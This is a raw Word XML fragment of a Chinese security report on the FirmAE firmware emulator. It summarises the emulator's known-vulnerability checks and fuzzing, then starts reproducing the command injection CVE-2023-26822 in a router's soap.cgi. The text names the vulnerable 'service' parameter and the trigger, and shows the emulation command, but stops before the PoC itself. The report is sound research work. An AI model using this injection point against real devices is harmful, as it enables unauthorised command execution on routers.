        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r w:rsidRPr="002E51A7">
        <w:t xml:space="preserve"> selenium 自动登录 webpage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2A7536" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞检查：首先，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E51A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E51A7">
        <w:t>RouterSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E51A7">
        <w:t>检查已知漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="002E51A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="002E51A7">
        <w:t>1-day vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E51A7">
        <w:t>RouterSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E51A7">
        <w:t>是一个包含多个已知漏洞利用代码（PoC）的平台，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 用</w:t>
      </w:r>
      <w:r w:rsidRPr="002E51A7">
        <w:t>来检查固件是否已经修补了已知的安全漏洞，或者是否新设备存在相同的漏洞。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，为了</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4232">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4232">
        <w:t>0-day漏洞，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4232">
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A4232">
        <w:t>开发了一个简单的Web模糊</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试工具（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fuzzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4232">
        <w:t>。这个模糊</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试工具</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4232">
        <w:t>能够生成各种恶意输入，发送到IoT设备的Web服务接口上，以触发潜在的安全漏洞。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fuzzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的构建上，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 会先</w:t>
      </w:r>
      <w:r w:rsidRPr="00526A7B">
        <w:t>搜索固件文件系统中的Web页面候选文件，如.html、.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00526A7B">
        <w:t>aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526A7B">
        <w:t>或.xml文件，并从中提取可能的参数，构建用于模糊测试的有效请求模板</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后</w:t>
      </w:r>
      <w:r w:rsidRPr="00526A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测命令注入和缓冲区溢出</w:t>
      </w:r>
      <w:r w:rsidRPr="00526A7B">
        <w:t>。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00526A7B">
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526A7B">
        <w:t>专注于检测命令注入和缓冲区溢出这两种常见的嵌入式设备漏洞。对于命令注入，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00526A7B">
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526A7B">
        <w:t>发送包含特定字符和执行二进制的恶意负载。对于缓冲区溢出，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00526A7B">
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526A7B">
        <w:t>会在发生崩溃时提供反馈。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后，</w:t>
      </w:r>
      <w:r w:rsidRPr="00526A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过挂钩系统调用（如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00526A7B">
        <w:t>execve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526A7B">
        <w:t>），来检测输入是否被注入到命令中，从而验证命令注入漏洞。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的动态分析模块</w:t>
      </w:r>
      <w:r w:rsidRPr="005607C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到了</w:t>
      </w:r>
      <w:r w:rsidRPr="005607C9">
        <w:t xml:space="preserve"> 320 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005607C9">
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005607C9">
        <w:t xml:space="preserve">已知 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005607C9">
        <w:t>cve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并且发现了12个0-day的漏洞，这些0-day漏洞影响了23个设备。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DF8137" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496D0AB3" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:keepNext/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79FC09E8" wp14:editId="5514F387">
            <wp:extent cx="4991100" cy="3719830"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="118254152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91100" cy="3719830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77404845" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Ref169825509"/>
      <w:r>
        <w:t>图表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ </w:instrText>
      </w:r>
      <w:r>
        <w:instrText>图表</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86053">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟成功率</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4232">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（来自论文</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4232">
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4232">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782177B3" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701"/>
    <w:p w14:paraId="36F9F8F3" w14:textId="77777777" w:rsidR="006C0701" w:rsidRPr="00CA6223" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA6223">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>工具复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E4E844" w14:textId="6C93AFED" w:rsidR="00F86C7F" w:rsidRPr="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>复现的漏洞为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2023-26822</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>这是一个命令注入漏洞。固件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>soapcgi_main</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>在运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>调用时直接使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> params </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> ?service= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>的值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BF8F57D" wp14:editId="24783847">
            <wp:extent cx="5274310" cy="361950"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13981428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61950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>通过伪造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>请求访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>soap.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>即可触发漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F86C7F">
        <w:t>firmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF4BA6" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./run.sh -r GORTAC750 /root/GORTAC750_A1_FW_v101b03.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F5FC12" w14:textId="1BA4BCA3" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="part"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>把固件模拟起来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4425F905" wp14:editId="3E1895AD">
            <wp:extent cx="5274310" cy="1701800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5282296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701800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F3C77E" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="part"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E39887" w14:textId="3E3916F2" w:rsidR="00F86C7F" w:rsidRPr="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="part"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>完成模拟后固件运行于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.0.1(interface : tap)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>，可以直接访问发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5F417F" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
